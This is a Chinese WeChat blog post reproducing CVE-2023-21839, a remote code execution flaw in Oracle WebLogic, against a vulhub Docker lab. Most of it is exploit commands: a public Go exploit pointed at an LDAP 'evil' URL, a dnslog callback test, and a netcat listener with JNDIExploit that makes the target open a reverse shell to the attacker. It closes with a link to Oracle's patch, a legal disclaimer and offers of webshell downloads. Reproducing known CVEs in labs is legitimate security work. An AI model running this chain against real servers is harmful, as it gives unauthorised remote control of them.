声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
一.影响范围
● weblogic_server = 12.2.1.3.0
● weblogic_server = 12.2.1.4.0
● weblogic_server = 14.1.1.1.0
二.环境搭建
这里我们使用vulhub上的环境来搭建
git clone https://github.com/vulhub/vulhub.git
cd CVE-2023-21839/
docker-compose up -d
想要查看密码可以查看容器日志
docker logs 容器id
docker logs 3ce1194ddbab
二.漏洞复现
简单复现
vulhub 官方复现工具:
GitHub - 4ra1n/CVE-2023-21839: Weblogic CVE-2023-21839 RCE
https://github.com/4ra1n/CVE-2023-21839
打开cmd文件夹里面有个main.go文件
使用方法为
go run main.go -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
这里先用dnslog测试一下
go run main.go -ip xxxxxxxx -port 7001 -ldap ldap://ab3x2c.dnslog.cn/evil
RCE
利用 JNDIExploit 进行 getshell
下载地址
https://github.com/zzwlpx/JNDIExploit
执行命令
先启动监听
nc -lvnp 7777
然后启动 JNDIExploit
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i ip
执行exp
go run main.go -ip ip -port 7001 -ldap ldap://ip:1389/Basic/ReverseShell/ip/7777
执行成功
三.修复建议
官方补丁
https://support.oracle.com/rs?type=doc&id=2917213.2
注:如有侵权请后台联系进行删除
觉得内容不错,请点一下"赞"和"在看"
1、公众号后台回复:搜索大法,获取searchall工具下载链接。
2、公众号后台回复:靶场,获取靶场工具网盘下载链接。
3、公众号后台回复:webshell,获取webshell下载链接。
原文始发于微信公众号(嗨嗨安全):漏洞复现|CVE-2023-21839 weblogicRCE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论